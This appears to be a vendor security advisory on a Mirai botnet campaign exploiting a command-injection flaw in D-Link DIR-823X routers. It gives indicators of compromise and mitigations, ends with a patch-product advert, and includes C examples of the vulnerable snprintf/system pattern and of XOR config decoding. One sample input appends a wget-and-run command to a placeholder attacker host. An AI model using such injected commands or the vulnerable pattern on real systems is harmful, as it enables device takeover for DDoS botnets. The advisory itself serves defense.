Researchers have uncovered an active Mirai botnet campaign exploiting CVE-2025-29635, a command-injection vulnerability in legacy D-Link DIR-823X routers, to recruit internet-exposed devices into a distributed denial-of-service (DDoS) botnet. Attackers deploy a Mirai malware variant known as “tuxnokill,” which establishes command-and-control (C2) communication, spreads to additional vulnerable IoT devices, and prepares infected systems for large-scale DDoS operations.
The objective of this campaign is simple but highly damaging: compromise unsupported D-Link routers at scale, weaponize them as Mirai botnet nodes, and leverage that infrastructure for DDoS attacks and further botnet propagation across connected networks.
Vulnerability & Affected Products
The campaign centers specifically around CVE-2025-29635:
| CVE ID | CVE-2025-29635 |
|---|---|
| Vulnerability Type | OS Command Injection (CWE-77) |
| CVSS Score | 7.2 (High) |
| EPSS Score | 58.94% |
| Affected Products | D-Link DIR-823X routers |
| Affected Firmware | Versions 240126 and 240802 |
| Vulnerable Endpoint | POST /goform/set_prohibiting |
| Root Cause | Unsanitized user input passed into system() via snprintf() |
| Fixed Version | No official patch available |
| Role in Campaign | Primary initial access vector |
Attack Methodology: CVE-2025-29635 Exploitation Chain
Exploitation of CVE-2025-29635 is fully automated and requires no user interaction. Any internet-exposed vulnerable D-Link DIR-823X router can be remotely compromised.
Initial Exploitation: Attackers send a specially crafted POST request to the /goform/set_prohibiting endpoint of the router. The vulnerability exists because attacker-controlled input is copied into a command string using snprintf() and later executed using the system() function without proper sanitization or validation. This allows attackers to inject shell metacharacters and execute arbitrary operating system commands directly on the device.
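The snprintf()-into-system() pattern described above, reduced to a stand-alone C example. This is added illustrative code, not the DIR-823X firmware: the command template, the parameter name and the assumption that the field is a MAC address are all hypothetical, since the page does not show the real command line. The vulnerable builder interpolates the request field straight into a shell command string; the hardened builder rejects anything that is not a well-formed MAC before the string exists. Only the command string is built here, so the example runs safely without calling system().

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical command template (assumption: the real set_prohibiting
 * command line is not on the page). On the device the result of snprintf()
 * would be handed to system(); here it is only built and inspected. */
#define CMD_TEMPLATE "iptables -A FORWARD -m mac --mac-source %s -j DROP"

/* VULNERABLE: the request field goes in unvalidated, so ';', '|', '`',
 * '$(' and friends reach the shell that system() spawns. */
int build_cmd_vulnerable(char *out, size_t outlen, const char *field)
{
    return snprintf(out, outlen, CMD_TEMPLATE, field);
}

/* Strict allow-list: exactly "xx:xx:xx:xx:xx:xx" with hex digits.
 * Anything else, including a MAC with injected commands appended, fails. */
int is_valid_mac(const char *s)
{
    if (strlen(s) != 17)
        return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}

/* HARDENED: validate first; returns -1 and writes nothing on bad input.
 * The remaining fix on a real device is to drop system() in favour of
 * fork()+execv() with a fixed argv, so no shell ever parses the field. */
int build_cmd_hardened(char *out, size_t outlen, const char *field)
{
    if (!is_valid_mac(field))
        return -1;
    return snprintf(out, outlen, CMD_TEMPLATE, field);
}

/* Shows what the vulnerable path lets through: any shell metacharacter. */
int contains_shell_metachar(const char *cmd)
{
    return strpbrk(cmd, ";|&`$()<>\n") != NULL;
}

int main(void)
{
    char cmd[256];
    /* Constructed inputs: a benign MAC, and the same MAC with a dropper
     * fetch appended (ATTACKER_HOST is a placeholder, not the campaign IP). */
    const char *benign = "00:11:22:33:44:55";
    const char *injected =
        "00:11:22:33:44:55; wget http://ATTACKER_HOST/dlink.sh -O /tmp/d.sh; sh /tmp/d.sh";

    build_cmd_vulnerable(cmd, sizeof cmd, injected);
    printf("vulnerable builds: %s\n  contains metachar: %d\n",
           cmd, contains_shell_metachar(cmd));
    printf("hardened(benign)   rc=%d\n", build_cmd_hardened(cmd, sizeof cmd, benign));
    printf("hardened(injected) rc=%d\n", build_cmd_hardened(cmd, sizeof cmd, injected));
    return 0;
}
```

Allow-listing the field is the cheap fix for a specific endpoint; removing the shell from the execution path is the structural one, because it also covers fields whose format is too loose to allow-list tightly.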
Downloader Delivery: After successful command injection, the attacker downloads a shell script named dlink.sh. The downloader infrastructure was observed hosted at 88.214.20[.]14. Multiple fallback methods such as busybox wget, curl, wget, tftp, and ftpget are used to ensure payload delivery even if some utilities are unavailable on the target device.
Payload Deployment: The dlink.sh script downloads and executes the Mirai malware payload named tuxnokill. The malware is compiled for multiple CPU architectures including ARM, MIPS, x86, and x86_64, enabling infection across diverse embedded Linux environments. This allows broad-scale compromise of heterogeneous IoT and networking devices.
Configuration Unpacking: Once executed, the malware decodes its embedded configuration using XOR Key: 0x30.
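An added C example (not the malware's own code) of how a single-byte XOR key such as 0x30 is confirmed and applied during analysis. The blob layout, NUL-separated encoded strings, is an assumption made for this example; the plaintexts are values the analysis reports (the hardcoded marker string and the C2 address and port). Rather than trusting the reported constant, the decoder brute-forces all 256 keys until the known marker appears, which is the check an analyst would run on a new sample whose key may differ.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TUX_XOR_KEY 0x30  /* key reported for the tuxnokill configuration */

/* In-place single-byte XOR; encoding and decoding are the same operation. */
void xor_buf(uint8_t *buf, size_t n, uint8_t key)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= key;
}

/* Constructed sample: NUL-separated strings encoded with TUX_XOR_KEY.
 * The layout is an assumption for this example; the strings are the marker
 * and C2 values reported in the analysis. Returns the blob length, 0 on overflow. */
size_t build_sample_blob(uint8_t *out, size_t cap)
{
    const char *plain[] = { "AI.NEEDS.TO.DIE", "64.89.161.130", "44300" };
    size_t off = 0;
    for (size_t k = 0; k < sizeof plain / sizeof plain[0]; k++) {
        size_t len = strlen(plain[k]) + 1;   /* keep the NUL terminator */
        if (off + len > cap)
            return 0;
        memcpy(out + off, plain[k], len);
        off += len;
    }
    xor_buf(out, off, TUX_XOR_KEY);
    return off;
}

/* Try all 256 keys until the known plaintext appears somewhere in the
 * decoded blob. Returns the key, or -1 if no key produces it. */
int recover_xor_key(const uint8_t *blob, size_t n, const char *known)
{
    size_t klen = strlen(known);
    for (int key = 0; key < 256; key++) {
        for (size_t i = 0; i + klen <= n; i++) {
            size_t j = 0;
            while (j < klen && (uint8_t)(blob[i + j] ^ key) == (uint8_t)known[j])
                j++;
            if (j == klen)
                return key;
        }
    }
    return -1;
}

/* Decode with the given key and split on decoded NULs; returns the count. */
size_t decode_strings(const uint8_t *blob, size_t n, uint8_t key,
                      char out[][64], size_t max_out)
{
    size_t count = 0, start = 0;
    for (size_t i = 0; i < n && count < max_out; i++) {
        if ((uint8_t)(blob[i] ^ key) == 0) {       /* decoded NUL = end of string */
            size_t len = i - start;
            if (len > 63)
                len = 63;                          /* truncate oversized entries */
            for (size_t j = 0; j < len; j++)
                out[count][j] = (char)(blob[start + j] ^ key);
            out[count][len] = '\0';
            count++;
            start = i + 1;
        }
    }
    return count;
}

int main(void)
{
    uint8_t blob[128];
    char strings[8][64];
    size_t n = build_sample_blob(blob, sizeof blob);
    int key = recover_xor_key(blob, n, "AI.NEEDS.TO.DIE");
    printf("recovered key: 0x%02x\n", key);
    size_t cnt = decode_strings(blob, n, (uint8_t)key, strings, 8);
    for (size_t i = 0; i < cnt; i++)
        printf("  [%zu] %s\n", i, strings[i]);
    return 0;
}
```

A recovered key of 0x00 means the sample is not encoded at all, and -1 means either the marker changed or the variant uses something other than a single-byte XOR, both of which are worth knowing before hunting for the C2 string.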
MITRE ATT&CK: Tactics and Techniques
| ID | Tactic | Technique | Description |
|---|---|---|---|
| TA0001 | Initial Access | T1190 – Exploit Public-Facing Application | Exploiting CVE-2025-29635 via crafted POST requests |
| TA0002 | Execution | T1059.004 – Unix Shell | Injected shell commands execute directly through system() |
| TA0011 | Command and Control | T1105 – Ingress Tool Transfer | Delivery of downloader script and Mirai payload to the compromised router |
| TA0005 | Defense Evasion | T1027 – Obfuscated Files or Information | XOR encoding hides malware configuration |
| TA0011 | Command and Control | T1071 – Application Layer Protocol | Communication with external C2 server |
| TA0040 | Impact | T1498 – Network Denial of Service | Mirai DDoS flooding operations |
Indicators of Compromise (IOCs)
The following artifacts were identified during analysis of the CVE-2025-29635 campaign:
| Type | Indicator |
|---|---|
| Downloader IP | 88.214.20[.]14 |
| C2 Server | 64.89.161[.]130:44300 |
| Malware Name | tuxnokill |
| Download Script | dlink.sh |
| Vulnerable Endpoint | POST /goform/set_prohibiting |
| Common Execution Paths | /tmp, /var/run, /mnt, /root, / |
| XOR Encoding Key | 0x30 |
| Hardcoded String | AI.NEEDS.TO.DIE |
SHA256 Hashes
- 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
- 32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
- be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
- d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
- 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8
Visual Attack Flow
[Attacker Sends Crafted POST to /goform/set_prohibiting]
-> [CVE-2025-29635 Command Injection Executes via system()]
-> [Shell Script dlink.sh Downloaded from 88.214.20[.]14]
-> [Mirai Payload “tuxnokill” Downloaded and Executed]
-> [XOR-Decoded Configuration Loaded: C2 + Attack Modules]
-> [Router Connects to C2 at 64.89.161[.]130:44300]
-> [Mirai Botnet Receives DDoS Commands]
-> [Compromised Router Participates in Large-Scale DDoS Attacks]
Key Takeaways & Mitigation
- Replace End-of-Life Devices Immediately: Since D-Link DIR-823X routers reached end-of-life in September 2025, no vendor patch is expected. Full device replacement is the safest and strongest mitigation.
- Remove Direct Internet Exposure: If replacement cannot happen immediately, remove the router from direct internet exposure using firewalls, VPN-only access, NAT restrictions, and internal network segmentation.
- Monitor for Outbound Connections: Alert on outbound traffic to 88.214.20[.]14 and 64.89.161[.]130, especially from devices that should not normally initiate external communications.
- Inspect for Unexpected Shell Activity: Watch for shell script downloads such as dlink.sh, repeated wget, curl, tftp, or ftpget attempts, and binaries executed from directories like /tmp or /var/run, as these are strong indicators of compromise.
- Segment IoT and Networking Devices: Place routers, cameras, DVRs, and embedded devices on isolated VLANs to prevent lateral movement into critical internal assets.
- Block Mirai-Like Traffic Patterns: Monitor for unusual outbound network flood behavior that may indicate the device is participating in Mirai-driven DDoS attacks.
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.
